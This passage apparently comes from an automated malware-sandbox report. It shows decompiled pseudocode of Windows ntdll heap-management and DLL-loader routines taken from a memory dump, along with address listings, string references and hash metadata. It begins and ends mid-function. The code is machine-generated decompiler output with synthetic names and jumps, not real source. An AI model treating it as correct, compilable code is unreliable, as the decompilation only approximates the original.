											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // -16
											E015FBC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						E015FBC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}

0x015f99ca
0x015f99cc
0x015f99df
0x015f99e3
0x015f99f8
0x015f99fb
0x015f99fb
0x00000000
0x015f9a48
0x015f9a48
0x015f9a4c
0x015f9a51
0x015f9a55
0x015f9a61
0x015f9a66
0x015f9a68
0x01641457
0x0164145c
0x0164145c
0x015f9a68
0x015f9a6e
0x015f9a71
0x015f9a74
0x015f9a76
0x01641466
0x01641469
0x01641469
0x0164146c
0x0164146e
0x01641471
0x01641474
0x01641477
0x01641479
0x0164159c
0x0164159c
0x0164159d
0x016415a6
0x016415ab
0x016415ab
0x00000000
0x016415ab
0x0164147f
0x01641481
0x00000000
0x00000000
0x0164148a
0x0164148d
0x01641493
0x01641495
0x016414c0
0x016414c0
0x016414c3
0x016414c6
0x016414c8
0x016414cb
0x016414cf
0x016414f2
0x016414f2
0x016414f5
0x016414f8
0x01641501
0x01641508
0x0164150b
0x0164150e
0x01641510
0x01641513
0x01641515
0x01641515
0x01641518
0x01641518
0x01641513
0x01641521
0x01641525
0x0164152a
0x0164152d
0x01641530
0x01641532
0x01641539
0x0164153d
0x0164155d
0x01641562
0x0164153f
0x01641555
0x0164155a
0x01641570
0x01641577
0x0164157c
0x01641582
0x01641585
0x01641589
0x0164158b
0x01641592
0x01641593
0x01641593
0x01641589
0x01641530
0x00000000
0x016414f8
0x016414d5
0x016414da
0x016414dc
0x00000000
0x016414de
0x016414e8
0x00000000
0x016414e8
0x01641497
0x01641497
0x016414a4
0x016414a4
0x016414a7
0x016414a9
0x016414ab
0x016414ab
0x0164149c
0x0164149e
0x016414a0
0x016414b0
0x016414b0
0x00000000
0x016414a2
0x016414a2
0x00000000
0x016414a2
0x016414a0
0x016414b3
0x016414bb
0x00000000
0x016414bb
0x01641495
0x015f9a7c
0x015f9a7c
0x015f9a7f
0x015f9a7f
0x015f9a82
0x015f9a84
0x015f9a87
0x015f9a8a
0x015f9a8d
0x015f9a8f
0x0164166a
0x0164166a
0x0164166b
0x01641674
0x00000000
0x01641674
0x015f9a95
0x015f9a97
0x00000000
0x00000000
0x015f9aa0
0x015f9aa3
0x015f9aa9
0x015f9aab
0x015f9ad7
0x015f9ad7
0x015f9ada
0x015f9add
0x015f9adf
0x015f9ae2
0x015f9ae6
0x015f9b22
0x015f9b27
0x015f9b29
0x00000000
0x015f9b2b
0x016415be
0x00000000
0x016415be
0x015f9b29
0x015f9ae8
0x015f9ae8
0x015f9aeb
0x015f9aee
0x016415cb
0x016415d2
0x016415d5
0x016415d7
0x016415da
0x016415dc
0x016415dc
0x016415dc
0x016415da
0x016415e5
0x016415e9
0x016415ee
0x016415f1
0x016415f3
0x016415f9
0x01641600
0x01641604
0x01641624
0x01641629
0x01641606
0x0164161c
0x01641621
0x01641637
0x0164163e
0x01641643
0x01641649
0x0164164c
0x01641650
0x01641656
0x0164165d
0x0164165e
0x0164165e
0x01641650
0x016415f3
0x015f9af4
0x015f9af7
0x015f9afc
0x015f9b00
0x015f9b04
0x015f9b08
0x015f9b14
0x015f99fe
0x015f9a04
0x015f9a07
0x00000000
0x015f9a29
0x0164169c
0x016416a0
0x016416a5
0x016416a9
0x016416b5
0x016416ba
0x016416bc
0x016416be
0x016416c3
0x016416c3
0x016416bc
0x016416c8
0x016416cc
0x0164181b
0x0164181b
0x0164181e
0x0164181e
0x01641821
0x01641823
0x01641826
0x01641829
0x0164182c
0x0164182e
0x01641688
0x01641688
0x01641689
0x0164168b
0x0164168c
0x0164168d
0x0164168f
0x01641692
0x00000000
0x01641692
0x01641834
0x01641836
0x00000000
0x00000000
0x0164183f
0x01641842
0x01641848
0x0164184a
0x01641875
0x01641875
0x01641878
0x0164187b
0x0164187d
0x01641880
0x01641884
0x016418a7
0x016418a7
0x016418aa
0x016418ad
0x016418b6
0x016418bd
0x016418c0
0x016418c3
0x016418c5
0x016418c8
0x016418ca
0x016418ca
0x016418cd
0x016418cd
0x016418c8
0x016418d5
0x016418da
0x016418df
0x016418e2
0x016418e5
0x016418e7
0x016418ee
0x016418f2
0x01641912
0x01641917
0x016418f4
0x0164190a
0x0164190f
0x01641925
0x0164192c
0x01641931
0x0164193a
0x0164193e
0x01641940
0x01641947
0x01641948
0x01641948
0x0164193e
0x016418e5
0x0164194f
0x01641952
0x01641956
0x0164195d
0x01641961
0x0164196d
0x00000000
0x0164196d
0x0164188a
0x0164188f
0x01641891
0x00000000
0x00000000
0x0164189d
0x00000000
0x0164189d
0x0164184c
0x01641859
0x01641859
0x0164185c
0x00000000
0x00000000
0x01641851
0x01641853
0x01641855
0x01641865
0x01641865
0x01641866
0x01641868
0x01641870
0x00000000
0x01641870
0x01641857
0x01641857
0x0164185e
0x00000000
0x016416d2
0x016416d2
0x016416d5
0x016416d5
0x016416d8
0x016416da
0x016416dd
0x016416e0
0x016416e3
0x016416e5
0x01641808
0x01641808
0x01641809
0x01641812
0x01641817
0x01641817
0x00000000
0x01641817
0x016416eb
0x016416ed
0x00000000
0x00000000
0x016416f6
0x016416f9
0x016416ff
0x01641701
0x0164172c
0x0164172c
0x0164172f
0x01641732
0x01641734
0x01641737
0x0164173b
0x0164175e
0x0164175e
0x01641761
0x01641764
0x0164176d
0x01641774
0x01641777
0x0164177a
0x0164177c
0x0164177f
0x01641781
0x01641781
0x01641784
0x01641784
0x0164177f
0x0164178c
0x01641791
0x01641796
0x01641799
0x0164179c
0x0164179e
0x016417a5
0x016417a9
0x016417c9
0x016417ce
0x016417ab
0x016417c1
0x016417c6
0x016417dc
0x016417e3
0x016417e8
0x016417ee
0x016417f1
0x016417f5
0x016417f7
0x016417fe
0x016417ff
0x016417ff
0x016417f5
0x0164179c
0x00000000
0x01641764
0x01641741
0x01641746
0x01641748
0x00000000
0x00000000
0x01641754
0x00000000
0x01641754
0x01641703
0x01641710
0x01641710
0x01641713
0x00000000
0x00000000
0x01641708
0x0164170a
0x0164170c
0x0164171c
0x0164171c
0x0164171d
0x0164171f
0x01641727
0x00000000
0x01641727
0x0164170e
0x0164170e
0x01641715
0x00000000
0x01641715
0x016416cc
0x015f9a45
0x015f9a45
0x015f9a0e
0x015f9a1c
0x015f9a23
0x0164167e
0x0164167f
0x01641681
0x01641683
0x01641684
0x00000000
0x01641684
0x00000000
0x015f9aad
0x015f9aad
0x015f9ab0
0x015f9ab3
0x015f9ab3
0x015f9ab6
0x00000000
0x00000000
0x015f9ab8
0x015f9aba
0x015f9abc
0x015f9ac8
0x015f9ac8
0x00000000
0x015f9abe
0x015f9abe
0x015f9ac0
0x00000000
0x015f9ac0
0x015f9abc
0x015f9ad2
0x00000000
0x015f9ad2
0x015f9aab

Strings

HEAP[%wZ]: , xrefs: 01641550, 01641617, 016417BC, 01641905
HEAP: , xrefs: 0164155D, 01641624, 016417C9, 01641912
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01641572, 01641639, 016417DE, 01641927

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: caba677fa53c1064e534e2ef25bc0a7a6117423680d990ca212f0e833f3e2a4b
Instruction ID: 033bfef074afa370564fe0bb8afec016829f2449a7345420f67173a4a4b0f7cd
Opcode Fuzzy Hash: caba677fa53c1064e534e2ef25bc0a7a6117423680d990ca212f0e833f3e2a4b
Instruction Fuzzy Hash: E022EF706006429FEB25CF29C884B7ABBF5FF46704F18856DE9868B346E771E885CB50

Uniqueness

Uniqueness Score: -1.00%

Function 015FB477, Relevance: 4.2, Strings: 3, Instructions: 405
COMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E015FB477(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int* _v20;
				signed int _v24;
				char _v28;
				signed int _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t139;
				void* _t141;
				signed int* _t143;
				signed int* _t144;
				intOrPtr* _t147;
				char _t160;
				signed int* _t163;
				signed char* _t164;
				intOrPtr _t165;
				signed int* _t167;
				signed char* _t168;
				intOrPtr _t193;
				intOrPtr* _t195;
				signed int _t203;
				signed int _t209;
				signed int _t211;
				intOrPtr _t214;
				intOrPtr* _t231;
				intOrPtr* _t236;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t240;
				intOrPtr _t241;
				char _t243;
				signed int _t252;
				signed int _t254;
				signed char _t259;
				signed int _t264;
				signed int _t268;
				intOrPtr _t277;
				unsigned int _t279;
				signed int* _t283;
				intOrPtr* _t284;
				unsigned int _t287;
				signed int _t291;
				signed int _t293;

				_v8 =  *0x16cd360 ^ _t293;
				_t223 = __edx;
				_v20 = __edx;
				_t291 = __ecx;
				_t276 =  *__edx;
				_t231 = E015FB8E4( *__edx);
				_t292 = __ecx + 0x8c;
				_v16 = _t231;
				if(_t231 == __ecx + 0x8c) {
					L38:
					_t131 = 0;
					L34:
					return E0161B640(_t131, _t223, _v8 ^ _t293, _t276, _t291, _t292);
				}
				if( *0x16c8748 >= 1) {
					__eflags =  *((intOrPtr*)(_t231 + 0x14)) -  *__edx;
					if(__eflags < 0) {
						_t214 =  *[fs:0x30];
						__eflags =  *(_t214 + 0xc);
						if( *(_t214 + 0xc) == 0) {
							_push("HEAP: ");
							E015DB150();
						} else {
							E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(UCRBlock->Size >= *Size)");
						E015DB150();
						__eflags =  *0x16c7bc8;
						if(__eflags == 0) {
							__eflags = 1;
							E01692073(_t223, 1, _t291, 1);
						}
						_t231 = _v16;
					}
				}
				_t5 = _t231 - 8; // -8
				_t292 = _t5;
				_t134 =  *((intOrPtr*)(_t292 + 6));
				if(_t134 != 0) {
					_t223 = (_t292 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
				} else {
					_t223 = _t291;
				}
				_t276 = _v20;
				_v28 =  *((intOrPtr*)(_t231 + 0x10));
				_t139 =  *(_t291 + 0xcc) ^  *0x16c8a68;
				_v12 = _t139;
				if(_t139 != 0) {
					 *0x16cb1e0(_t291,  &_v28, _t276);
					_t141 = _v12();
					goto L8;
				} else {
					_t203 =  *((intOrPtr*)(_t231 + 0x14));
					_v12 = _t203;
					if(_t203 -  *_t276 <=  *(_t291 + 0x6c) << 3) {
						_t264 = _v12;
						__eflags = _t264 -  *(_t291 + 0x5c) << 3;
						if(__eflags < 0) {
							 *_t276 = _t264;
						}
					}
					_t209 =  *(_t291 + 0x40) & 0x00040000;
					asm("sbb ecx, ecx");
					_t268 = ( ~_t209 & 0x0000003c) + 4;
					_v12 = _t268;
					if(_t209 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v48);
						_push(3);
						_push(_t291);
						_push(0xffffffff);
						_t211 = E01619730();
						__eflags = _t211;
						if(_t211 < 0) {
							L56:
							_push(_t268);
							_t276 = _t291;
							E0169A80D(_t291, 1, _v44, 0);
							_t268 = 4;
							goto L7;
						}
						__eflags = _v44 & 0x00000060;
						if((_v44 & 0x00000060) == 0) {
							goto L56;
						}
						__eflags = _v48 - _t291;
						if(__eflags != 0) {
							goto L56;
						}
						_t268 = _v12;
					}
					L7:
					_push(_t268);
					_push(0x1000);
					_push(_v20);
					_push(0);
					_push( &_v28);
					_push(0xffffffff);
					_t141 = E01619660();
					 *((intOrPtr*)(_t291 + 0x20c)) =  *((intOrPtr*)(_t291 + 0x20c)) + 1;
					L8:
					if(_t141 < 0) {
						 *((intOrPtr*)(_t291 + 0x214)) =  *((intOrPtr*)(_t291 + 0x214)) + 1;
						goto L38;
					}
					_t143 =  *( *[fs:0x30] + 0x50);
					if(_t143 != 0) {
						__eflags =  *_t143;
						if(__eflags == 0) {
							goto L10;
						}
						_t144 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
						L11:
						if( *_t144 != 0) {
							__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
							if(__eflags != 0) {
								E0169138A(_t223, _t291, _v28,  *_v20, 2);
							}
						}
						if( *((intOrPtr*)(_t291 + 0x4c)) != 0) {
							_t287 =  *(_t291 + 0x50) ^  *_t292;
							 *_t292 = _t287;
							_t259 = _t287 >> 0x00000010 ^ _t287 >> 0x00000008 ^ _t287;
							if(_t287 >> 0x18 != _t259) {
								_push(_t259);
								E0168FA2B(_t223, _t291, _t292, _t291, _t292, __eflags);
							}
						}
						_t147 = _v16 + 8;
						 *((char*)(_t292 + 2)) = 0;
						 *((char*)(_t292 + 7)) = 0;
						_t236 =  *((intOrPtr*)(_t147 + 4));
						_t277 =  *_t147;
						_v24 = _t236;
						_t237 =  *_t236;
						_v12 = _t237;
						_t238 = _v16;
						if(_t237 !=  *((intOrPtr*)(_t277 + 4)) || _v12 != _t147) {
							_push(_t238);
							_push(_v12);
							E0169A80D(0, 0xd, _t147,  *((intOrPtr*)(_t277 + 4)));
							_t238 = _v16;
						} else {
							_t195 = _v24;
							 *_t195 = _t277;
							 *((intOrPtr*)(_t277 + 4)) = _t195;
						}
						if( *(_t238 + 0x14) == 0) {
							L22:
							_t223[0x30] = _t223[0x30] - 1;
							_t223[0x2c] = _t223[0x2c] - ( *(_t238 + 0x14) >> 0xc);
							 *((intOrPtr*)(_t291 + 0x1e8)) =  *((intOrPtr*)(_t291 + 0x1e8)) +  *(_t238 + 0x14);
							 *((intOrPtr*)(_t291 + 0x1fc)) =  *((intOrPtr*)(_t291 + 0x1fc)) + 1;
							 *((intOrPtr*)(_t291 + 0x1f8)) =  *((intOrPtr*)(_t291 + 0x1f8)) - 1;
							_t279 =  *(_t238 + 0x14);
							if(_t279 >= 0x7f000) {
								 *((intOrPtr*)(_t291 + 0x1ec)) =  *((intOrPtr*)(_t291 + 0x1ec)) - _t279;
								_t279 =  *(_t238 + 0x14);
							}
							_t152 = _v20;
							_t240 =  *_v20;
							_v12 = _t240;
							_t241 = _v16;
							if(_t279 <= _t240) {
								__eflags =  *((intOrPtr*)(_t241 + 0x10)) + _t279 - _t223[0x28];
								if( *((intOrPtr*)(_t241 + 0x10)) + _t279 != _t223[0x28]) {
									 *_v20 = _v12 + ( *_t292 & 0x0000ffff) * 8;
									L26:
									_t243 = 0;
									 *((char*)(_t292 + 3)) = 0;
									_t276 = _t223[0x18];
									if(_t223[0x18] != _t223) {
										_t160 = (_t292 - _t223 >> 0x10) + 1;
										_v24 = _t160;
										__eflags = _t160 - 0xfe;
										if(_t160 >= 0xfe) {
											_push(0);
											_push(0);
											E0169A80D(_t276, 3, _t292, _t223);
											_t160 = _v24;
										}
										_t243 = _t160;
									}
									 *((char*)(_t292 + 6)) = _t243;
									_t163 =  *( *[fs:0x30] + 0x50);
									if(_t163 != 0) {
										__eflags =  *_t163;
										if( *_t163 == 0) {
											goto L28;
										}
										_t227 = 0x7ffe0380;
										_t164 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
										goto L29;
									} else {
										L28:
										_t227 = 0x7ffe0380;
										_t164 = 0x7ffe0380;
										L29:
										if( *_t164 != 0) {
											_t165 =  *[fs:0x30];
											__eflags =  *(_t165 + 0x240) & 0x00000001;
											if(( *(_t165 + 0x240) & 0x00000001) != 0) {
												__eflags = E015F7D50();
												if(__eflags != 0) {
													_t227 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x89]);
												}
												_t276 = _t292;
												E01691582(_t227, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t227 & 0x000000ff);
											}
										}
										_t223 = 0x7ffe038a;
										_t167 =  *( *[fs:0x30] + 0x50);
										if(_t167 != 0) {
											__eflags =  *_t167;
											if( *_t167 == 0) {
												goto L31;
											}
											_t168 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
											goto L32;
										} else {
											L31:
											_t168 = _t223;
											L32:
											if( *_t168 != 0) {
												__eflags = E015F7D50();
												if(__eflags != 0) {
													_t223 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
												}
												_t276 = _t292;
												E01691582(_t223, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t223 & 0x000000ff);
											}
											_t131 = _t292;
											goto L34;
										}
									}
								}
								_t152 = _v20;
							}
							E015FB73D(_t291, _t223,  *((intOrPtr*)(_t241 + 0x10)) + _v12 + 0xffffffe8, _t279 - _v12, _t292, _t152);
							 *_v20 =  *_v20 << 3;
							goto L26;
						} else {
							_t283 =  *(_t291 + 0xb8);
							if(_t283 != 0) {
								_t190 =  *(_t238 + 0x14) >> 0xc;
								while(1) {
									__eflags = _t190 - _t283[1];
									if(_t190 < _t283[1]) {
										break;
									}
									_t252 =  *_t283;
									__eflags = _t252;
									_v24 = _t252;
									_t238 = _v16;
									if(_t252 == 0) {
										_t190 = _t283[1] - 1;
										__eflags = _t283[1] - 1;
										L70:
										E015FBC04(_t291, _t283, 0, _t238, _t190,  *(_t238 + 0x14));
										_t238 = _v16;
										goto L19;
									}
									_t283 = _v24;
								}
								goto L70;
							}
							L19:
							_t193 =  *_t238;
							_t284 =  *((intOrPtr*)(_t238 + 4));
							_t254 =  *((intOrPtr*)(_t193 + 4));
							_v24 = _t254;
							_t238 = _v16;
							if( *_t284 != _t254 ||  *_t284 != _t238) {
								_push(_t238);
								_push( *_t284);
								E0169A80D(0, 0xd, _t238, _v24);
								_t238 = _v16;
							} else {
								 *_t284 = _t193;
								 *((intOrPtr*)(_t193 + 4)) = _t284;
							}
							goto L22;
						}
					}
					L10:
					_t144 = 0x7ffe0380;
					goto L11;
				}
			}

0x015fb486
0x015fb48a
0x015fb48e
0x015fb491
0x015fb493
0x015fb49a
0x015fb49c
0x015fb4a2
0x015fb4a7
0x015fb6fc
0x015fb6fc
0x015fb6b3
0x015fb6c3
0x015fb6c3
0x015fb4b4
0x0164294f
0x01642951
0x01642957
0x0164295d
0x01642961
0x01642980
0x01642985
0x01642963
0x01642978
0x0164297d
0x0164298b
0x01642990
0x01642995
0x0164299d
0x016429a1
0x016429a2
0x016429a2
0x016429a7
0x016429a7
0x01642951
0x015fb4ba
0x015fb4ba
0x015fb4bd
0x015fb4c2
0x015fb6d4
0x015fb4c8
0x015fb4c8
0x015fb4c8
0x015fb4cd
0x015fb4d0
0x015fb4d9
0x015fb4df
0x015fb4e2
0x016429b7
0x016429bd
0x00000000
0x015fb4e8
0x015fb4e8
0x015fb4ef
0x015fb4fa
0x015fb703
0x015fb709
0x015fb70b
0x015fb711
0x015fb711
0x015fb70b
0x015fb503
0x015fb50c
0x015fb511
0x015fb514
0x015fb519
0x016429c5
0x016429c7
0x016429cc
0x016429cd
0x016429cf
0x016429d0
0x016429d2
0x016429d7
0x016429d9
0x016429ee
0x016429ee
0x016429f4
0x016429fa
0x01642a01
0x00000000
0x01642a01
0x016429db
0x016429df
0x00000000
0x00000000
0x016429e1
0x016429e4
0x00000000
0x00000000
0x016429e6
0x016429e6
0x015fb51f
0x015fb51f
0x015fb520
0x015fb525
0x015fb52b
0x015fb52d
0x015fb52e
0x015fb530
0x015fb535
0x015fb53b
0x015fb53d
0x01642a07
0x00000000
0x01642a07
0x015fb549
0x015fb54e
0x01642a12
0x01642a15
0x00000000
0x00000000
0x01642a24
0x015fb559
0x015fb55c
0x01642a34
0x01642a3b
0x01642a4d
0x01642a4d
0x01642a3b
0x015fb566
0x015fb56b
0x015fb56f
0x015fb57b
0x015fb582
0x01642a57
0x01642a5c
0x01642a5c
0x015fb582
0x015fb58b
0x015fb58e
0x015fb592
0x015fb596
0x015fb599
0x015fb59b
0x015fb59e
0x015fb5a3
0x015fb5a6
0x015fb5a9
0x01642a66
0x01642a67
0x01642a73
0x01642a78
0x015fb5b8
0x015fb5b8
0x015fb5bb
0x015fb5bd
0x015fb5bd
0x015fb5c4
0x015fb5f7
0x015fb5f7
0x015fb600
0x015fb606
0x015fb60c
0x015fb612
0x015fb618
0x015fb621
0x015fb623
0x015fb629
0x015fb629
0x015fb62c
0x015fb62f
0x015fb633
0x015fb636
0x015fb639
0x015fb71d
0x015fb720
0x015fb736
0x015fb660
0x015fb660
0x015fb662
0x015fb665
0x015fb66a
0x015fb6e6
0x015fb6e7
0x015fb6ea
0x015fb6ef
0x01642ad1
0x01642ad2
0x01642ad8
0x01642add
0x01642add
0x015fb6f5
0x015fb6f5
0x015fb672
0x015fb675
0x015fb67a
0x01642ae5
0x01642ae8
0x00000000
0x00000000
0x01642af4
0x01642afc
0x00000000
0x015fb680
0x015fb680
0x015fb680
0x015fb685
0x015fb687
0x015fb68a
0x01642b06
0x01642b0c
0x01642b13
0x01642b1e
0x01642b20
0x01642b2b
0x01642b2b
0x01642b2b
0x01642b34
0x01642b45
0x01642b45
0x01642b13
0x015fb696
0x015fb69b
0x015fb6a0
0x01642b4f
0x01642b52
0x00000000
0x00000000
0x01642b61
0x00000000
0x015fb6a6
0x015fb6a6
0x015fb6a6
0x015fb6a8
0x015fb6ab
0x01642b70
0x01642b72
0x01642b7d
0x01642b7d
0x01642b7d
0x01642b86
0x01642b97
0x01642b97
0x015fb6b1
0x00000000
0x015fb6b1
0x015fb6a0
0x015fb67a
0x015fb722
0x015fb722
0x015fb655
0x015fb65d
0x00000000
0x015fb5c6
0x015fb5c6
0x015fb5ce
0x01642a83
0x01642a97
0x01642a97
0x01642a9a
0x00000000
0x00000000
0x01642a88
0x01642a8a
0x01642a8c
0x01642a8f
0x01642a92
0x01642aa1
0x01642aa1
0x01642aa2
0x01642aab
0x01642ab0
0x00000000
0x01642ab0
0x01642a94
0x01642a94
0x00000000
0x01642a9c
0x015fb5d4
0x015fb5d4
0x015fb5d6
0x015fb5d9
0x015fb5de
0x015fb5e1
0x015fb5e4
0x01642ab8
0x01642ab9
0x01642ac4
0x01642ac9
0x015fb5f2
0x015fb5f2
0x015fb5f4
0x015fb5f4
0x00000000
0x015fb5e4
0x015fb5c4
0x015fb554
0x015fb554
0x00000000
0x015fb554

Strings

HEAP[%wZ]: , xrefs: 01642973
(UCRBlock->Size >= *Size), xrefs: 0164298B
HEAP: , xrefs: 01642980

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: ff9e013f1eddfe7493b115702ef2fcb988811c46b7a27d495d3fdff62d8f798e
Instruction ID: 559e85e236fa0ccfa86a281341de7630de6e260f07cadbb03b8c16ce54622819
Opcode Fuzzy Hash: ff9e013f1eddfe7493b115702ef2fcb988811c46b7a27d495d3fdff62d8f798e
Instruction Fuzzy Hash: 3EE16B70600246DFDB19CF68D894BBABBB6FB44304F2485ADE6169F391D734E981CB90

Uniqueness

Uniqueness Score: -1.00%

Function 015E8794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E015E8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E015E934A() != 0) {
								_t159 = E0165A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x16c5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01655510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x16c5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E015E849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E015E8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E015E8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x16c5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x16c5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E015F2280(_t92, 0x16c86cc);
															_t94 = E016A9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E016061A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x16c5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E015E8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x16c5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x16c5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
